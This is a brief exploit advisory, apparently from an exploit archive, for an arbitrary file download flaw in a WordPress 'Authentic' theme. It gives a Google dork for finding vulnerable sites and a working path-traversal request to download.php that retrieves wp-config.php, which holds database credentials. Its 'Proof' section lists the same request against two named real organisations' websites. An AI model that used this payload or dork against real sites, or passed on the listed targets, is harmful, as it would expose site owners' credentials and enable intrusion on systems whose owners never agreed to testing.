WordPress Authentic theme suffers from an arbitrary file download vulnerability. Note that this finding houses site-specific data.
3fb05a1ff5059197a68b63f8a42972fadb202c1f37a2eb251656ffd7ab5ba15f
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Authentic Theme Arbitrary File Download
Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/authentic
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/authentic-theme
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
ttp://www.newlifecenterwv.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|[*]
http://www.pillarhoodriver.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|